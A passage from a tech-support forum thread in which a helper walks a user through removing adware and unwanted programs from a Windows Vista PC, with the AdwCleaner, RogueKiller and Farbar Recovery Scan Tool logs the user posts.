Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task
Deleted HKLM\Software\Microsoft\Shared Tools\MSConfig\services\wbsvc
Deleted HKCU\Software\Microsoft\Internet Explorer\SearchScopes|DoNotAskAgain
Deleted HKLM\Software\Microsoft\Internet Explorer\SearchScopes|DoNotAskAgain
Deleted HKCU\Software\tstamptoken
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\OneSystemCare
Deleted HKCU\Software\PROPCCleanerLanguage
Deleted HKCU\Software\PRODUCTSETUP
Deleted HKCU\Software\REG\CLEAN\pro
Deleted HKLM\Software\REG\CLEAN\pro
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledsDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}
Deleted HKCU\Software\Genius
Deleted HKCU\Software\Classes\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKU\S-1-5-18\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKCU\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKU\S-1-5-20\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKU\S-1-5-19\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKU\.DEFAULT\Software\{4E7638A1-6962-4e44-A6B9-F40E84FD6D09}
Deleted HKU\S-1-5-18\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-18\Software\shopperz
Deleted HKU\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-18\Software\shopperz
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B643A498-2E30-4C67-B841-A7AEDD004C4B}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00FF43E5-657C-4B78-B399-7ACBEF0A3292}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh
Deleted HKCU\Software\systweak
Deleted HKLM\Software\systweak
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SystemHealer
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{38F1B313-1F9E-486F-81E2-B88C8BA48973}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius
Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB
Deleted HKCU\Software\TutoTag
Deleted HKCU\Software\Tutorials
Deleted HKLM\Software\Tutorials
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Deleted HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION|wb.exe

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [17358 octets] - [20/03/2007 01:11:07]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#2
Hi Rustys,

You've got a good one there lol.
It's been well and truly abused.

First thing to do is to set the clock.
Both FRST and AdwCleaner are both showing:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24.10.2018
Ran by Angela (administrator) on ANGELA-PC (20-03-2007 01:02:34)
-----------------
Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-09-21.1 (Local)
# Support: Customer Support & Help Center
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 03-20-2007


Before trying to clean up the report, we need to hit this system with something a bit harder than AdwCleaner.

Step 1
Please uninstall the following program:
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION

Step 2
Please download RogueKiller Anti-malware (Free) onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on RogueKiller Anti-malware to install the tool.
    Vista/Windows 7/8/10 users right-click and select Run As Administrator.
  • Select Accept the User Agreement then continue to click Next then finally click Install
  • Click Finish
    .
  • When the program opens..... click Scan

    xlaNP72.png

  • Click Start Scan

    tJMzjQd.png

    kKWieQ3.png
  • Double check anything found and tick to select items to be removed

    xlG6ZkU.png
  • Click Remove Selected
  • When the items have been removed.... Click Open Report >> Open TXT.
  • Copy and paste that report into your next reply.

Step 3
Re-run FRST and let me have a fresh set of reports ( after running Rogue Killer)

In your next reply, please submit:
Rogue Killer report
Fresh set of FRST reports.


Thanks.
 

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#3
You've got a good one there lol.
It's been well and truly abused.
:bolt:

Step 1
Please uninstall the following program:
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
Can not find any where want me to do the other scans now that the Clock and date are set (need to replace CMOS battery).
 

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#5
Hope they help...:tongue-new:


RogueKiller Anti-Malware V13.0.5.0 [Oct 31 2018] (Free) by Adlice Software

mail : Contact - Adlice Software

Website : RogueKiller Anti-Malware Free Download - Official Website

Operating System : Windows Vista (6.0.6002 Service Pack 2) 32 bits

Started in : Normal mode

User : Angela [Administrator]

Started from : C:\Program Files\RogueKiller\RogueKiller.exe

Mode : Standard Scan, Delete -- Date : 2018/10/31 17:12:41 (Duration : 00:51:19)

Delete

[PUP.Gen0 (Potentially Malicious)] knsj6E67.tmp -- %ProgramFiles%\74697254-1425516543-2D2D-2D2D-0003254135CB\knsj6E67.tmp -> Killed [TermThr]

[PUP.Gen0 (Potentially Malicious)] jnsqBF1A.tmp -- %_Angela_appdata%\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp -> Killed [TermThr]

[VT.Detected (Malicious)] AudioSrv.exe [Hefei Hejunzhengce Info Tech Co., Ltd.] -- %ProgramFiles%\Windows Audio\R1\AudioSrv.exe -> Killed [TermThr]

[VT.Detected (Malicious)] wmnserv.exe -- %ProgramFiles%\Windows Network Services\v9\wmnserv.exe -> Killed [TermThr]

[Bad.Extension (Malicious)] igfxrENU.lrc [Microsoft Windows Hardware Compatibility Publisher] -- %SystemRoot%\System32\igfxrenu.lrc -> Unloaded

[Adw.NetFilter (Malicious)] cherimoya -- %SystemRoot%\System32\drivers\cherimoya.sys -> Stopped

[PUP.Gen0 (Potentially Malicious)] cyriryvo -- %ProgramFiles%\74697254-1425516543-2D2D-2D2D-0003254135CB\knsj6E67.tmp -> Stopped

[PUP.Gen0 (Potentially Malicious)] gyviboxy -- %_Angela_appdata%\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp -> Stopped

[VT.Detected (Malicious)] WinAudioSrv_R1 [Hefei Hejunzhengce Info Tech Co., Ltd.] -- %ProgramFiles%\Windows Audio\R1\AudioSrv.exe -> Stopped

[VT.Detected (Malicious)] wmmserv_r11 -- %ProgramFiles%\Windows Network Services\v9\wmnserv.exe -> Stopped

[Suspicious.Path (Potentially Malicious)] \Xoiihrsematu -- "C:\ProgramData\Xoiihrsematu\1.0.7.1\boofssix.exe" ("/e=L3A9MjY0NjAxXi91PWE3OGRhMWI4MDU5YTQ4NDg4YTJmNjUzNzI4NjkxOGQ0Xi9kPWRvd25sb2FkdHZ0aW1lLmNvbV4vbj1UVlRNXi9hPVRWVGltZV4vdA==") -> Deleted

[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost|LocalServiceNoNetwork -- PLA DPS BFE mpssvc ehstart -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\cherimoya -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\cyriryvo -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\gyviboxy -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\protect -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\cherimoya -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\cyriryvo -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\gyviboxy -- -> Deleted

[PUP.Gen0 (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\protect -- -> Deleted

[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowPrinters -- 0 -> Replaced (1)

[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowRun -- 0 -> Replaced (1)

[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowRecentDocs -- 0 -> Replaced (1)

[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_TrackProgs -- 0 -> Replaced (1)

[PUP.FlashBeat|PUP.Gen0|PUP.Gen1 (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows|AppInit_DLLs -- C:\ProgramData\FlashBeat\THIHPQ32.dll __C:\PROGRA~1\SEARCH~1\SEARCH~1\bin\VC32LO~1.DLL -> Replaced ()

[PUP.Gen0 (Potentially Malicious)] jnsqBF1A.tmp -- %_Angela_appdata%\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp -> Deleted

[PUP.Gen1 (Potentially Malicious)] Genius -- %_Angela_appdata%\Genius -> Deleted

[BitMiner.Gen0 (Malicious)] Optimizer -- %programdata%\Optimizer -> Deleted

[PUP.Gen0 (Potentially Malicious)] 74697254-1174378719-2D2D-2D2D-0003254135CB -- %ProgramFiles%\74697254-1174378719-2D2D-2D2D-0003254135CB -> Deleted

[PUP.Gen0 (Potentially Malicious)] 74697254-1425516543-2D2D-2D2D-0003254135CB -- %ProgramFiles%\74697254-1425516543-2D2D-2D2D-0003254135CB -> Deleted

[PUP.Gen0 (Potentially Malicious)] 74697254-1174378719-2D2D-2D2D-0003254135CB -- %ProgramFiles%\74697254-1174378719-2D2D-2D2D-0003254135CB -> Removed at reboot [2]

[PUP.Gen0 (Potentially Malicious)] 74697254-1425516543-2D2D-2D2D-0003254135CB -- %ProgramFiles%\74697254-1425516543-2D2D-2D2D-0003254135CB -> Removed at reboot [2]

[PUP.Gen1 (Potentially Malicious)] Genius -- %_Angela_appdata%\Genius -> Removed at reboot [2]

[Hj.Shortcut (Malicious)] N/A -- {2AA82634-4FEB-407B-8C66-59F04CC7B66A} -> Deleted


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24.10.2018
Ran by Angela (administrator) on ANGELA-PC (31-10-2018 17:17:20)
Running from C:\Users\Angela\Desktop
Loaded Profiles: Angela (Available Profiles: Angela)
Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
() C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe
(Absolute Software Corp.) C:\Windows\System32\rpcnet.exe
(SupportSoft, Inc.) C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe
() C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Aurora.scr [1370624 2008-01-20] (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{4FBC5B6D-A7DA-42E7-B33A-E7180E83D7D1}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{B70AE2D1-D67F-4712-BEEC-16719D97668E}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Toolbar: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll [2007-06-08] (Microsoft Corporation)

FireFox:
========
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-07] [Legacy] [not signed]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: (Default Manager) - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2011-01-07] [Legacy] [not signed]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-10-30] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-10-30] (Google Inc.)

Chrome:
=======
StartMenuInternet: Google Chrome.L7J5TMSOM5SFHPIGRLQDE2HRWY - C:\Users\Angela\AppData\Local\Microsoft\Internet Explorer\Application\46.10.2479.3\switcher_ie.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ETService; C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
S3 GameConsoleService; C:\Program Files\Gateway Games\Gateway Game Console\GameConsoleService.exe [250616 2009-03-30] (WildTangent, Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4753104 2018-05-09] (Malwarebytes)
R2 rpcnet; C:\Windows\system32\rpcnet.exe [78032 2007-03-20] (Absolute Software Corp.)
R2 sprtlisten; C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe [1213728 2008-01-08] (SupportSoft, Inc.)
S2 WinAudioSrv_R1; C:\Program Files\Windows Audio\R1\AudioSrv.exe [4024920 2015-04-07] (Hefei Hejunzhengce Info Tech Co., Ltd.)
R2 WlanWpsSvc; C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe [167936 2011-06-30] () [File not signed]
S2 wmmserv_r11; C:\Program Files\Windows Network Services\v9\wmnserv.exe [3402752 2015-11-17] (@Microsoft Corporation) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [128736 2018-04-26] (Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [165088 2007-03-20] (Malwarebytes)
R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [40160 2018-10-31] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [220896 2018-10-31] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [70264 2018-10-31] (Malwarebytes)
S3 pneteth; C:\Windows\System32\DRIVERS\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
S3 RTL8192cu; C:\Windows\System32\DRIVERS\WNA1000M.sys [700520 2011-01-31] (Realtek Semiconductor Corporation )
R1 RtlProt; C:\Windows\System32\DRIVERS\rtlprot.sys [25896 2007-04-23] (Windows (R) Codename Longhorn DDK provider)
R0 SymDS; C:\Windows\System32\drivers\NAV\1302000.00A\SYMDS.SYS [340088 2011-07-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NAV\1302000.00A\SYMEFA.SYS [897656 2011-09-26] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [127096 2011-12-29] (Symantec Corporation)
S1 SymIRON; C:\Windows\system32\drivers\NAV\1302000.00A\Ironx86.SYS [149624 2011-07-25] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NAV\1302000.00A\SYMTDIV.SYS [344184 2011-07-25] (Symantec Corporation)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [43520 2012-02-15] (Apple, Inc.) [File not signed]
S3 UVCFTR; C:\Windows\System32\Drivers\UVCFTR_S.SYS [11776 2007-05-23] (Chicony Electronics Co., Ltd.)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S1 qrnfd_1_10_0_9; system32\drivers\qrnfd_1_10_0_9.sys [X]
S1 swsedrvr_vt_1_10_0_29; system32\drivers\swsedrvr_vt_1_10_0_29.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag2.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis.sys [X]
S1 {a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt; system32\drivers\{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 17:16 - 2018-10-31 17:17 - 000018280 _____ C:\Users\Angela\Desktop\Addition.txt
2018-10-31 17:15 - 2018-10-31 17:17 - 000008979 _____ C:\Users\Angela\Desktop\FRST.txt
2018-10-31 17:13 - 2018-10-31 17:13 - 000010724 _____ C:\Users\Angela\Desktop\RogueKiller.txt
2018-10-31 16:13 - 2018-10-31 17:14 - 000000000 ____D C:\ProgramData\RogueKiller
2018-10-31 16:12 - 2018-10-31 17:15 - 000000000 ____D C:\Program Files\RogueKiller
2018-10-31 16:12 - 2018-10-31 16:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-10-31 16:12 - 2018-10-31 15:36 - 029185344 _____ (Adlice Software ) C:\Users\Angela\Desktop\RogueKiller_setup.exe
2018-10-31 00:40 - 2018-10-31 00:40 - 000001857 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\Program Files\Malwarebytes
2018-10-31 00:40 - 2018-04-26 05:36 - 000128736 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2018-10-31 00:39 - 2018-10-31 00:39 - 076534856 _____ (Malwarebytes ) C:\Users\Angela\Desktop\mb3-setup-legacywos-3.5.1.2522-1.0.365-1.0.5292.exe
2018-10-31 00:35 - 2018-10-31 00:35 - 007592144 _____ (Malwarebytes) C:\Users\Angela\Desktop\AdwCleaner.exe
2018-10-30 22:25 - 2018-10-30 22:25 - 000068072 _____ (Absolute Software Corp.) C:\Windows\system32\agremove.exe
2018-10-30 22:16 - 2018-10-30 22:16 - 000000302 _____ C:\3C4D.tmp
2018-10-30 16:39 - 2018-10-30 22:27 - 000000000 ____D C:\Users\Angela\Desktop\New Folder
2018-10-30 11:46 - 2018-10-30 13:15 - 000000000 ____D C:\Windows\pss
2018-10-29 10:54 - 2018-10-30 16:22 - 000000680 _____ C:\Users\Angela\AppData\Local\d3d9caps.dat

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 17:17 - 2007-03-20 01:02 - 000000000 ____D C:\FRST
2018-10-31 17:12 - 2015-03-04 18:49 - 000000000 ____D C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB
2018-10-31 16:13 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\inf
2018-10-31 16:13 - 2006-11-02 04:33 - 000759582 _____ C:\Windows\system32\PerfStringBackup.INI
2018-10-31 16:02 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\ModemLogs
2018-10-31 15:34 - 2007-03-20 01:18 - 000070264 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2018-10-31 15:22 - 2009-03-11 22:48 - 000000000 _____ C:\Windows\system32\LogConfigTemp.xml
2018-10-31 15:22 - 2007-03-20 01:18 - 000220896 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-10-31 15:22 - 2007-03-20 01:18 - 000040160 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2018-10-31 15:22 - 2007-03-20 00:12 - 000078032 _____ (Absolute Software Corp.) C:\Windows\system32\rpcnet.dll
2018-10-31 15:22 - 2007-03-20 00:05 - 000017408 _____ C:\Windows\system32\rpcnetp.exe
2018-10-31 15:22 - 2006-11-02 07:01 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-10-31 15:22 - 2006-11-02 06:47 - 000004384 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2018-10-31 15:22 - 2006-11-02 06:47 - 000004384 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2018-10-31 11:00 - 2007-03-20 01:01 - 001774592 _____ (Farbar) C:\Users\Angela\Desktop\FRST.exe
2018-10-31 00:36 - 2015-06-25 09:42 - 000000000 _____ C:\Users\Angela\Documents\IE11-Windows6.1-x86-en-us.exe
2018-10-31 00:14 - 2010-01-05 15:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MX320 series Manual
2018-10-30 23:47 - 2013-11-27 19:22 - 000000000 ____D C:\Users\Angela\AppData\Local\Downloaded Installations
2018-10-30 19:00 - 2006-11-02 05:18 - 000000000 ___SD C:\Windows\Downloaded Program Files
2018-10-30 18:50 - 2009-02-23 20:03 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2018-10-30 18:49 - 2009-07-14 17:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Print Shop
2018-10-30 18:35 - 2015-05-16 11:16 - 000000000 ____D C:\Windows\Minidump
2018-10-30 18:35 - 2014-01-27 12:10 - 000000000 ____D C:\Users\Angela\AppData\Local\CrashDumps
2018-10-30 18:35 - 2007-07-11 19:49 - 000000000 ____D C:\Windows\Panther
2018-10-30 18:27 - 2014-10-03 12:00 - 000000000 ____D C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2018-10-30 18:18 - 2010-10-23 14:23 - 000000000 ___HD C:\ProgramData\CanonIJScan
2018-10-30 18:06 - 2009-07-14 20:44 - 000000000 ____D C:\Program Files\Oberon Media
2018-10-30 17:20 - 2007-03-20 01:48 - 000000000 ____D C:\Users\Angela\AppData\Local\gmsd_us_005010193
2018-10-30 16:17 - 2006-11-02 06:47 - 000345464 _____ C:\Windows\system32\FNTCACHE.DAT
2018-10-30 13:13 - 2015-04-07 12:10 - 000000000 ____D C:\Program Files\Internet Explorer 11
2018-10-30 13:13 - 2007-03-20 01:23 - 000000000 ____D C:\Users\Angela\AppData\Roaming\chrome
2018-10-30 13:01 - 2007-03-20 01:42 - 000000000 ____D C:\ProgramData\DataFile
2018-10-30 12:28 - 2009-05-18 17:18 - 000000000 ____D C:\Program Files\Common Files\supportsoft
2018-10-30 11:03 - 2010-10-04 13:02 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\Macromedia
2018-10-30 11:03 - 2009-02-23 20:23 - 000000000 ____D C:\Windows\system32\Macromed
2018-10-29 10:54 - 2010-11-09 18:26 - 000000000 ____D C:\Users\Angela\AppData\Roaming\FrostWire
2018-10-29 10:46 - 2007-04-24 19:51 - 000000000 ____D C:\Temp

==================== Files in the root of some directories =======

2009-11-25 14:35 - 2009-11-25 14:35 - 000087608 _____ () C:\Users\Angela\AppData\Roaming\inst.exe
2009-11-25 14:35 - 2009-11-25 14:35 - 000007887 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.cat
2009-11-25 14:35 - 2009-11-25 14:35 - 000001144 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.inf
2009-11-25 14:36 - 2009-11-25 14:36 - 000000034 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.log
2009-11-25 14:35 - 2009-11-25 14:35 - 000047360 _____ (VSO Software) C:\Users\Angela\AppData\Roaming\pcouffin.sys
2018-10-29 10:54 - 2018-10-30 16:22 - 000000680 _____ () C:\Users\Angela\AppData\Local\d3d9caps.dat
2009-04-29 01:07 - 2014-10-24 10:23 - 000010240 _____ () C:\Users\Angela\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-28 20:10 - 2013-10-28 20:10 - 000000079 _____ () C:\Users\Angela\AppData\Local\DVDPATH.TXT

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
